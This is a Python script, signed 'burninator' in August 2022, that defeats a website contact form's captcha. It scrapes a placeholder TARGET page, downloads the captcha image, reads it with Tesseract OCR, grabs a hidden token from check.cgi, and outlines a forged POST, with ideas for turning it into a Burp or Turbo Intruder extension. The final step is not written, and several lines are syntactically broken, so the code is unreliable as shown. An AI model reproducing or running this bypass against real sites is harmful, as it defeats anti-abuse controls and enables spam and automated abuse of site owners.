import cv2
import pytesseract
from urllib.request import urlopen
import numpy as np
from bs4 import BeautifulSoup
import requests
import urllib.parse
import re
#burninator August 2022
#captcha bypass: by hitting the validation check API directly PLUS using OCR AI library to read the captcha
#contact_check_page = requests.get('')
#testRegexTheCode = '/RECAPTCHACODE/RECAPTCHA.png'
#x = re.findall("[0-9]+",testRegexTheCode)
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0'}
# STEP ONE - get the recaptcha image text value first, before the .cgi check (order matters!)
#thesoupson = open('TARGET/TARGET.htm', 'r')
thesoupofcontact = requests.get('TARGET/', headers=headers) #also tested and working
thesoupson = thesoupofcontact.text
#for line in thesoupson:
# print (str(line))
soup = BeautifulSoup(thesoupson, "html.parser")
images = soup.findAll('img')
for image in images:
if ('recaptcha.png' in image['src']):
print(str('target captcha ' + image['src']))
targetCaptcha = image['src']
recaptchaCodeMatch = re.findall("[0-9]+",targetCaptcha)
fromRecaptchaUrl = recaptchaCodeMatch[0]
pytesseract.pytesseract.tesseract_cmd = r'C:\PROGRA~1\Tesseract-OCR\tesseract.exe' #set env vars here because... MEH!
# Loading image using OpenCV
req = urlopen('https://TARGET+targetCaptcha)
arr = np.asarray(bytearray(, dtype=np.uint8)
img = cv2.imdecode(arr, -1)
#cv2.imshow('lalala', img)
if cv2.waitKey() & 0xff == 27: quit()
#img = cv2.imread('recaptcha.png')
# Converting to text
answerToRecaptcha = pytesseract.image_to_string(img)
print(str("this is the captcha text TEEHEE!" ) + answerToRecaptcha)
#STEP TWO - get the CGI value - usually loaded from Javascript from the
#CGI request is tested and working, tho i just added that cgisouprequestvar:
cgisouprequest = requests.get('https://TARGET/check.cgi')
cgisoup = cgisouprequest.text
#cgisoup = open('TARGET/contact_check.cgi', 'r')
soupses = BeautifulSoup(cgisoup, "html.parser")
inputs = soupses.findAll('input')
for input in inputs:
print (str(input['value']))
thevalue = str(input['value'])
encodeme = urllib.parse.quote(thevalue, safe="")
contactCheckValue = encodeme
#STEP THREE - build out the POST request with the stuff with the two variables + that same randomized User-Agent string
# also consider building this into either a Burp extension or Turbo Intruder (most likely an extension since it allows calling python modules or other treats from the path)